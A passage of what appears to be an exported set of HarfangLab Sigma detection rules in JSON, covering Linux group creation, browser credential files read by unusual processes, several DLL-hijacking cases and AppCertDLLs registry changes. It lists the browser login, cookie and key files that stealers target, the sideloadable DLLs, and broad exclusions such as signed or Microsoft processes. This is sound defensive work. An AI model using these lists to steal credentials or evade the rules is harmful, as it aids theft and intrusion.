'/usr/bin/python?.? /usr/bin/dnf'\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - '/usr/libexec/platform-python /bin/dnf'\n - '/usr/libexec/platform-python /usr/bin/dnf'\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n # This command is different on debian distros\n exclusion_nxlog_redhat:\n ProcessParentCommandLine|contains: ' /var/tmp/rpm-tmp'\n ProcessCommandLine: 'groupadd -r nxlog'\n\n exclusion_puppet:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n exclusion_containers:\n Ancestors|contains:\n - '/bin/dockerd|'\n - '|/usr/bin/systemd-nspawn|'\n - '/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/podman|'\n\n exclusion_eset:\n Ancestors|endswith: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|/usr/lib/systemd/systemd'\n\n exclusion_trendmicro:\n CommandLine: '/usr/sbin/groupadd -f tm_xes'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "955e6d93-f3e3-4d66-8187-cb8496828588",
"rule_name": "Group Created via groupadd",
"rule_description": "Detects a suspicious attempt to create a new group.\nAdversaries may create new groups to hide their activity or achieve persistence.\nIt is recommended to check the created group for malicious intent and to analyze the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2025-05-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9584cb1b-7b89-49ee-82d2-5cf2f2cef3fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587101Z",
"creation_date": "2026-03-23T11:45:34.587104Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587112Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/",
"https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_generic_stealer_browser_data_accessed.yml",
"content": "title: Browser Data Read by Unusual Process\nid: 9584cb1b-7b89-49ee-82d2-5cf2f2cef3fd\ndescription: |\n Detects an attempt to read browser data files from an unusual process.\n This may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\n It is recommended to investigate the process performing this action to determine its legitimacy.\n If you assume this to be a breach, it is recommended to perform an investigation to determine the specific malware used, what information has been exfiltrated and change the credentials of the affected users.\n Further information about different stealers is present in the references.\nreferences:\n - https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/\n - https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf\n - https://attack.mitre.org/techniques/T1005/\ndate: 2023/05/04\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1185\n - attack.discovery\n - attack.t1217\n - attack.privilege_escalation\n - attack.t1555.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Stealer.Generic\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: filesystem_read\ndetection:\n selection_chromium:\n ProcessImage|contains: '?'\n Path|contains:\n - '\\AppData\\Local\\Yandex\\YandexBrowser\\User Data'\n - '\\AppData\\Local\\Iridium\\User Data'\n - '\\AppData\\Local\\Chromium\\User Data'\n - '\\AppData\\Local\\7Star\\7Star\\User Data'\n - '\\AppData\\Local\\Torch\\User Data'\n - '\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data'\n - '\\AppData\\Local\\Kometa\\User Data'\n - '\\AppData\\Local\\Amigo\\User Data'\n - '\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data'\n - '\\AppData\\Local\\CentBrowser\\User Data'\n - '\\AppData\\Local\\Chedot\\User Data'\n - '\\AppData\\Local\\Orbitum\\User Data'\n - '\\AppData\\Local\\Sputnik\\Sputnik\\User Data'\n - '\\AppData\\Local\\Comodo\\Dragon\\User Data'\n - '\\AppData\\Local\\360Chrome\\Chrome\\User Data'\n - '\\AppData\\Local\\uCozMedia\\Uran\\User Data'\n - '\\AppData\\Local\\liebao\\User Data'\n - '\\AppData\\Local\\Elements Browser\\User Data'\n - '\\AppData\\Local\\Epic Privacy Browser\\User Data'\n - '\\AppData\\Local\\CocCoc\\Browser\\User Data'\n - '\\AppData\\Local\\QIP Surf\\User Data'\n - '\\AppData\\Local\\Coowon\\Coowon\\User Data'\n - '\\AppData\\Local\\Google\\Chrome\\User Data'\n - '\\AppData\\Local\\Microsoft\\Edge\\User Data'\n - '\\AppData\\Local\\Tencent\\QQBrowser\\User Data'\n\n selection_firefox:\n ProcessImage|contains: '?'\n Path|contains:\n - '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'\n - '\\AppData\\Roaming\\Waterfox\\Profiles'\n - '\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles'\n - '\\AppData\\Roaming\\librewolf\\Profiles'\n - '\\AppData\\Roaming\\Basilisk\\Profiles'\n - '\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles'\n - '\\Browser\\TorBrowser\\Data\\Browser\\profile.default'\n - '\\Comodo\\IceDragon\\Profiles'\n\n selection_files:\n Path|contains:\n - '\\logins.json'\n - '\\cert9.db'\n - '\\key4.db'\n - '\\cookies.sqlite'\n - '\\cookies.sqlite3'\n - '\\formhistory.sqlite'\n - '\\formhistory.sqlite3'\n - '\\places.sqlite'\n - '\\places.sqlite3'\n - '\\Login Data'\n - '\\Cookies'\n - '\\Bookmarks'\n - '\\History'\n - '\\Web Data'\n\n filter_browsers:\n ProcessImage|endswith:\n - '\\ChromiumPortable.exe'\n - '\\YandexBrowser.exe' # Chromium Based Browsers\n - '\\yandex.exe'\n - '\\iridium.exe'\n - '\\chrome.exe'\n - '\\chromium.exe'\n - '\\7star.exe'\n - '\\7xing.exe'\n - '\\torch.exe'\n - '\\chromeplus.exe'\n - '\\kometa.exe'\n - '\\amigo.exe'\n - '\\brave.exe'\n - '\\centbrowser.exe'\n - '\\chedot.exe'\n - '\\orbitum.exe'\n - '\\sputnik.exe'\n - '\\dragon.exe'\n - '\\vivaldi.exe'\n - '\\citrio.exe'\n - '\\360chrome.exe'\n - '\\uran.exe'\n - '\\liebao.exe'\n - '\\elementsbrowser.exe'\n - '\\epic.exe'\n - '\\coccocbrowser.exe'\n - '\\qipsurf.exe'\n - '\\coowon.exe'\n - '\\msedge.exe'\n - '\\qqbrowser.exe'\n - '\\firefox.exe' # Firefox Based Browsers\n - '\\waterfox.exe'\n - '\\palemoon.exe'\n - '\\librewolf.exe'\n - '\\basilisk.exe'\n - '\\seamonkey.exe'\n - '\\icedragon.exe'\n - '\\Zen Browser\\zen.exe'\n\n # AV products may scan different browser files, such as cache or extensions.\n # The exclusion for cache/extension read should handle most of them.\n # The problem is some them read absolutely everything.\n filter_installers:\n ProcessImage|endswith:\n - '\\AppData\\Local\\\\*\\Update\\Install\\\\*.exe' # Chromium Installers\n - '\\AppData\\Local\\\\*\\Installer\\setup.exe'\n\n # Too many signed AV and other programs to exclude by hand.\n filter_signed:\n ProcessSigned: 'true'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n # Lot of programs have their own unsigned certutil.exe\n exclusion_certutil:\n ProcessImage|endswith: 'certutil.exe'\n\n exclusion_libre_office:\n ProcessImage|endswith:\n - 'soffice.bin'\n - 'soffice.exe'\n ProcessCompany|contains:\n - 'LibreOffice'\n - 'OpenOffice'\n\n # Most custom unsigned browsers have \"The Chromium Authors\" as CompanyName\n exclusion_custom_chromium:\n ProcessCompany: \"The Chromium Authors\"\n\n exclusion_snmp_walk:\n ProcessImage|endswith: '\\LANDesk\\LDClient\\snmpwalk.exe'\n\n exclusion_wazuh:\n ProcessImage|endswith: '\\ossec-agent\\wazuh-agent.exe'\n\n exclusion_burp:\n ProcessImage|endswith: '\\Burp\\bin\\burp.exe'\n\n exclusion_fortify:\n ProcessImage|endswith: '\\Fortify\\fortify.exe'\n ProcessCompany: 'Peculiar Ventures'\n\n exclusion_spiceworks:\n ProcessImage|endswith: '\\Spiceworks\\Agent\\Spiceworks Agent Service.exe'\n ProcessCompany: 'Spiceworks, Inc.'\n\n exclusion_open_videopresence:\n ProcessImage|endswith: '\\Open Videopresence\\open-videopresence.exe'\n ProcessCompany: 'Orange'\n\n exclusion_zenworks:\n ProcessImage|endswith: 'Novell\\ZENworks\\bin\\ZenworksWindowsService.exe'\n ProcessCompany: 'Novell, Inc.'\n\n exclusion_forticlient:\n ProcessImage|endswith: '\\Fortinet\\FortiClient\\fmon.exe'\n ProcessCompany: 'Fortinet Inc.'\n\n exclusion_scrobbler:\n ProcessImage|endswith: '\\Vidoc\\Scrobbler\\VidocScrobbler.exe'\n\n exclusion_clamav:\n ProcessImage|endswith: '\\ClamWin\\bin\\clamscan.exe'\n ProcessCompany: 'ClamWin Antivirus'\n\n exclusion_7z_1:\n ProcessImage|endswith: '\\7-Zip\\7z.exe'\n ProcessCompany: 'Igor Pavlov'\n exclusion_7z_2:\n ProcessOriginalFileName: '7za.exe'\n ProcessCompany: 'Igor Pavlov'\n\n exclusion_flow_launcher:\n ProcessImage|endswith: '\\Flow.Launcher.exe'\n ProcessCompany: 'Flow Launcher'\n\n # Excluding these because of signature issues in the agent which is RUINING MY FP RATE\n exclusion_bitdefender:\n ProcessImage|endswith: '\\Bitdefender\\Endpoint Security\\EPSecurityService.exe'\n ProcessCompany: 'Bitdefender'\n\n # May God have mercy for I won't.\n exclusion_microsoft:\n ProcessCompany|contains: 'Microsoft'\n\n exclusion_pspad:\n ProcessImage|endswith: 'PSPad Editor\\PSPad'\n ProcessCompany: 'Prog-Soft s.r.o.'\n\n exclusion_git:\n ProcessImage|endswith:\n - '\\AppData\\Local\\Programs\\Git\\usr\\bin\\du.exe'\n - '\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n\n exclusion_velociraptor:\n ProcessOriginalFileName: 'Velociraptor.exe'\n ProcessCompany: 'Rapid 7 Inc'\n ProcessDescription: 'Velociraptor: Digging Deeper!'\n\n exclusion_supercopier:\n ProcessCompany: 'SFX TEAM'\n ProcessDescription: 'SuperCopier 2 (explorer file copy replacement)'\n ProcessInternalName: 'SuperCopier2'\n\n exclusion_ccleaner:\n ProcessOriginalFileName: 'ccleaner.exe'\n ProcessCompany: 'Piriform Software Ltd'\n ProcessDescription: 'CCleaner'\n\n exclusion_keypirinha:\n ProcessOriginalFileName: 'keypirinha-x64.exe'\n ProcessCompany: 'Jean-Charles Lefebvre'\n ProcessDescription: 'Keypirinha'\n\n exclusion_cookiefix:\n ProcessOriginalFileName: 'CookieFix.dll'\n ProcessCompany: 'CookieFix'\n ProcessDescription: 'CookieFix'\n\n exclusion_rsync:\n ProcessImage:\n - '?:\\cygwin\\bin\\rsync.exe'\n - '?:\\cygwin64\\bin\\rsync.exe'\n - '?:\\rsync\\usr\\bin\\rsync.exe'\n - '?:\\\\*\\Tools\\Rsync\\bin\\rsync.exe'\n - '*\\MobaXterm\\slash\\bin\\rsync.exe'\n\n exclusion_duplicati:\n ProcessImage: '?:\\ProgramData\\Duplicati\\updates\\\\*\\Duplicati.GUI.TrayIcon.exe'\n\n exclusion_zhpcleaner:\n ProcessProduct: 'ZHPcleaner'\n ProcessCompany: 'Nicolas Coolman'\n\n exclusion_adwcleaner:\n ProcessOriginalFileName: 'AdwCleaner.exe'\n ProcessCompany: 'Malwarebytes'\n\n exclusion_clbackup:\n ProcessOriginalFileName: 'clBackup.exe'\n ProcessCompany: 'Commvault'\n\n condition: (selection_chromium or selection_firefox) and selection_files and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9584cb1b-7b89-49ee-82d2-5cf2f2cef3fd",
"rule_name": "Browser Data Read by Unusual Process",
"rule_description": "Detects an attempt to read browser data files from an unusual process.\nThis may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\nIf you assume this to be a breach, it is recommended to perform an investigation to determine the specific malware used, what information has been exfiltrated and change the credentials of the affected users.\nFurther information about different stealers is present in the references.\n",
"rule_creation_date": "2023-05-04",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1185",
"attack.t1217",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95af5d1d-59ae-4c66-aab0-c03f4c84b280",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601573Z",
"creation_date": "2026-03-23T11:45:34.601577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601585Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sndvol.yml",
"content": "title: DLL Hijacking via SndVol.exe\nid: 95af5d1d-59ae-4c66-aab0-c03f4c84b280\ndescription: |\n Detects potential Windows DLL Hijacking via SndVol.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SndVol.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\mmdevapi.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95af5d1d-59ae-4c66-aab0-c03f4c84b280",
"rule_name": "DLL Hijacking via SndVol.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SndVol.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95bd2930-2a9d-46a0-8810-77de1fa84fbe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597560Z",
"creation_date": "2026-03-23T11:45:34.597566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597577Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsmgmt.yml",
"content": "title: DLL Hijacking via dsmgmt.exe\nid: 95bd2930-2a9d-46a0-8810-77de1fa84fbe\ndescription: |\n Detects potential Windows DLL Hijacking via dsmgmt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsmgmt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\samlib.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95bd2930-2a9d-46a0-8810-77de1fa84fbe",
"rule_name": "DLL Hijacking via dsmgmt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsmgmt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95e02498-70d3-402d-b84b-4583d48d3396",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090003Z",
"creation_date": "2026-03-23T11:45:34.090005Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090009Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://attack.mitre.org/techniques/T1546/009/"
],
"name": "t1546_009_persistence_registry_appcert_dlls.yml",
"content": "title: Registry AppCert DLLs Modified\nid: 95e02498-70d3-402d-b84b-4583d48d3396\ndescription: |\n Detects the modification of the AppCertDLLs key in registry.\n Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.\n Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key are loaded into every process that calls the ubiquitously used application programming interface (API) functions like CreateProcess, CreateProcessAsUser, ...\n It is recommended to investigate the process at the origin of the registry modification to determine whether this action is legitimate.\nreferences:\n - https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\n - https://attack.mitre.org/techniques/T1546/009/\ndate: 2020/09/24\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.009\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppCertDLLs' # AppCertDLLs\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppCertDLLs' # AppCertDLLs\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95e02498-70d3-402d-b84b-4583d48d3396",
"rule_name": "Registry AppCert DLLs Modified",
"rule_description": "Detects the modification of the AppCertDLLs key in registry.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.\nDynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key are loaded into every process that calls the ubiquitously used application programming interface (API) functions like CreateProcess, CreateProcessAsUser, ...\nIt is recommended to investigate the process at the origin of the registry modification to determine whether this action is legitimate.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.009"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95ff9084-6538-444d-acf3-7fffad95e7f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590598Z",
"creation_date": "2026-03-23T11:45:34.590603Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590615Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wcchromenativemessaginghost.yml",
"content": "title: DLL Hijacking via WCChromeNativeMessagingHost.exe\nid: 95ff9084-6538-444d-acf3-7fffad95e7f5\ndescription: |\n Detects potential Windows DLL Hijacking via WCChromeNativeMessagingHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WCChromeNativeMessagingHost.exe'\n ProcessSignature:\n - 'Adobe Systems, Incorporated'\n - 'Adobe Inc.'\n ImageLoaded|endswith: '\\vcruntime140.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Adobe\\Acrobat *\\Acrobat\\Browser\\WCChromeExtn\\'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat *\\Acrobat\\Browser\\WCChromeExtn\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95ff9084-6538-444d-acf3-7fffad95e7f5",
"rule_name": "DLL Hijacking via WCChromeNativeMessagingHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WCChromeNativeMessagingHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-05-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
